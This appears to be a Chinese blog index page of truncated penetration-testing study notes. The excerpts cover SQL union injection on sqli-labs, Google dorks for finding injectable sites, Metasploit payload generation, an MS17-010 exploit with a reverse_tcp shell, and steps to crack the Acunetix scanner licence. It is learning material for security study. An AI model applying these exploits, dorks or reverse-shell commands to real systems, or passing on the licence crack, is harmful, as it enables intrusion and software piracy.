2. 网易web安全渗透 union联合查询注入
1. sql union操作符union操作符是用于,并合两个或者多个select语句的结果注意,union内部的 select语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 select语句中的列的顺序必须相同默认情况,union操作符选取不同的值。如果允许重复的值,请使用 union ALL.。
2. 注入应用场景
只有最后一个 SELECT子句允许有 ORDER BY;
只有最后一个 SELECT子句允许有uMT;
只要UNON连接的几个查询的字段数一样且列的数据类型转换没有问题,就可以查询出结果
注入点页面有回显;
sql注入流程图 ,下面就按照上面的流程进行注入
1.ORDER BY 判断列数ORDER BY 是用来排序的进行排序这个ORDER BY 关键字经常用于sql注入的时候,根据错误,判断有几个表列下面有6个表判断有几个表ORDER BY 7就报错了,应为他只有6个表ORDER BY 6就对了用sqli-labs进行测试输入4发现就报错了,那这样就判断出来,字段是有3个
2. 观察页面返回,选择可以显示数据的位置,进行下一步的注入我们输入URL地 ...
1. 网易web安全渗透 手动sql注入
sql注入
靶场环境搭建
环境环境搭建服务器软件是phpstudy下载地址https://www.xp.cn/靶场是sqli-labs下载地址是https://github.com/Audi-1/sqli-labs配置sqli-labs的sql密码
用php5和mysql5.7
成功
注入的常用的函数
123select system_user(); 系统用户名 select user(); 当前数据库用户名select current_user(); 当前用户名
1select database(); 返回当前使用的数据库
1234select version() mysql; 数据库版本select @@datadir; 数据库路径select @@basedir; 数据库安装路径select @@global.version_compile_os; 操作系统的信息
寻找注入点无特定目标
1inurl:php?id=
有特定目标
1inurl:php?id=site:xxxx.com
检查注入点
手工 ...
5. Metasploit之生成木马
再学Metasploit之前学习的Metasploit没有写笔记都忘掉了,这次叫完整的学习内容记录下来payloadsexploit是指利用漏洞的一个过程,最终的目的是为了执行payloads即使我们不使用payload直接发给目标进行执行也是可以实现执行payloads
演示
查看payloads
1show payloads
use payload/windows/shell_bind_tcp就拿个模块演示客户端运行 payloads就在本地监听端口叫攻击者去连接拿到shell下面就是他默认的配置,我们不需要修改就可以生成payloads了命令
1generate
下面生成的是ruby的16进行的payloads3. 生成出来的ruby的16进行的payloads里面可能有坏字符,导致程序不能执行长被称为坏字符\x00过滤坏字符的命令
1generate -b "要过滤的字符"
可以看到没有了发现文件变大了是应为编码后有可能1个字节变成2个字节了发现他使用了encoder他是默认去选择优秀的encoder4. 选择encoders查看有什么encode ...
4. Metasploit之Exploit模块
再学Metasploit之前学习的Metasploit没有写笔记都忘掉了,这次叫完整的学习内容记录下来1. Active Exploit 主动的
某种服务器开放的端口,攻击者主动发起漏洞利用代码,比如反弹shell代码执行,拿到目标shell
主动的就是主动发起漏洞利用代码
演示
命令
12345678use exploit/windows/smb/ms17_010_psexecset RHOST 192.168.1.100 //目标ipset PAYLOAD windows/shell/reverse_tcp //一个反弹的shellset LHOST 192.168.1.1 //要反弹的那个ipset LPORT 4444 set SMBUSER 系统用户名set SMBPASS 系统密码exploit
2. Passive Exploit被动的
被攻击者是不存在漏洞的,漏洞存在客户端软件上,客户端访问远程服务器端的服务, ...
3.Metasploit使用
去年学的都忘了掉了没有写笔记再学Metasploit学习笔记,我启动msf后出现的问题
123456{20-04-09 16:35}kali:~ kali% sudo msfconsole[sudo] kali 的密码:[-] ***rting the Metasploit Framework console...|[-] * WARNING: No database support: No database YAML file[-] ***
查看数据库没有连接
12msf5 > db_status [*] postgresql selected, no connection
解决这个问题初始化一下数据库就可以了命令
1msfdb init
然后重启一下msf就可以了
开始正式的笔记命令介绍
db命令介绍db按Tab键查看
db_status:查看是否连接到数据库
db_disconnect:断开连接数据库
db_connect:连接,可以用-h命令查看使用
db_nmap:这个和在命令行nmap一样,这个就是扫描的结果会保持到数据库里面扫描一下db_n ...
2. Mestasploit 基本使用
苑房弘课程我的学习笔记进行更新Mestasploit命令:apt update; apt install metasploit-framework
Mestasploit启动 安静的启动-q 指定文件启动-r 查看版本信息-v
常用的参数
查看参数help查看参数或者输入?也可以但是?不能Tab补齐了-h查看参数的使用如果你那个参数忘了怎么使用的了可以用 参数名 -h
banner(小贴士)命令
color(颜色修改)
connect(和nc一样)
show命令 请一定认真看。如果单纯的输入show,那么就会显示出所有的payload,利用模块,post模块,插件等等。但是一般我们都不这么使用 下面的模块在这个有介绍https://blog.csdn.net/qq_41860876/article/details/105383802 rank:表示好用级别:normal(正常),excellent(优秀),good(良好),average(平均)
5.1 payloads(攻击载荷模块) payloads 模块:命名规则: 操作系统/类型/名称 5.2 auxiliary ...
1.Metasploit介绍和模块
苑房弘课程学习msf的笔记
Metasploit是一个非常强大的渗透测试框架
2003年有HD Moore编写的,2007 年用 ruby 语言编写
框架继承了渗透测试标准(PETS)标准
一定程度上统一了渗透测试研究的工作环境
新的攻击代码可以比较容易的加入框架
开发活跃版本更新频繁
早期版本基于社区力量维护,被 Rapid 7 收购后大枣出其商业版本产品
目前分化为四个版本,社区版依然十分活跃
HD More说:为 Metasploit 写书是种自虐
2009年10月21号,漏洞管理解决公司Rapid7收购Metasploit项目
Metasploit 有四个版本,默认kali linux 集成的是Metasploit Framework版本
开始Metasploit Framework简称msf下面我们就说Metasploit Framework这个来介绍
msf他使用的是 postgresql 数据库
扫描下来得到的信息都保存到postgresql数据库数据库里
MSF架构
1. Rex
Rex是msf最基本依赖的库,
基本功能库,用于完成日常基本任 ...
树莓派安装kali linux和说明
我玩树莓派的经历,自学习网络安全也有好几年了
应为我也是才上职高二年级的一个普通的学生,买树莓派也是考虑了很长时间,毕竟是学生党几百块已经算很贵的了,考虑了很长时间就决定买了一个树莓派,我买的是
树莓派4b 4g
32g内存卡和读卡器
电源
壳子
摄像头
开始安装kali linux玩过kali的人,其实在树莓派安装kali很简单的官方下载地址:https://www.offensive-security.com/kali-linux-arm-images/我下载的是这个下载完成要解压出来,也可以校验一下是否下载时缺少什么吗记得要叫下载好的文件解压出来用win32diskimager工具可以在百度上下载到
插入树莓派启动即可如果没有屏幕,可以插入网线,
用Xshell 6工具去连接ssh点击连接然后输入账号默认是root密码是toor看一下已经连接上去了这个我就用他默认的源
12deb http://http.kali.org/kali kali-rolling main non-free contribdeb-src http:/ ...
kali linux awvs13安装
废话不多说awvs13 linux版安装 PO解版的解压出来就是这样的
下面是他的安装运行赋予执行权限
1chmod +x acunetix_13.0.200217097_x64_.sh
运行
1./acunetix_13.0.200217097_x64_.sh
然后一直按回车就可以了,知道出现下面的,输入yes然后让你添加主机名这个我添加的是127.0.0.1输入邮箱,这个是输入的是我的qq邮箱然后输入密码其中至少包含以下3个字符:1个数字,1个小写字母,1个大写字母和1个特殊字
开始破解在解压的目录里面,终端输入覆盖wvsc文件和 license_info.json
12cp -rf wvsc /home/acunetix/.acunetix/v_200217097/scanner/cp -rf license_info.json /home/acunetix/.acunetix/data/license/
启动123service acunet ...
Sqli-labs Less1-4关卡
Less1
开始打开 Less1可以看到是这样的输入http://192.168.43.90/Less-1/?id=1sql语句是SELECT * FROM users WHERE id=' 1' LIMIT 0,1可以看到有显示输入http://192.168.43.90/Less-1/?id= 1 'sql语句是SELECT * FROM users WHERE id=' 1'' LIMIT 0,1发现错了存在sql注入漏洞
判断是字符还是数字输入http://192.168.43.90/Less-1/?id=1 ' --+ 'sql语句是SELECT * FROM users WHERE id=' 1 ' 他没有报错发现是字符输入http://192.168.43.90/Less-1/?id= 'union select 1,user(),3 --+可以看到执行成功
Less2
开始输入http://192.168.43.90/Less-2/?id=1sql语句是SELECT * FROM ...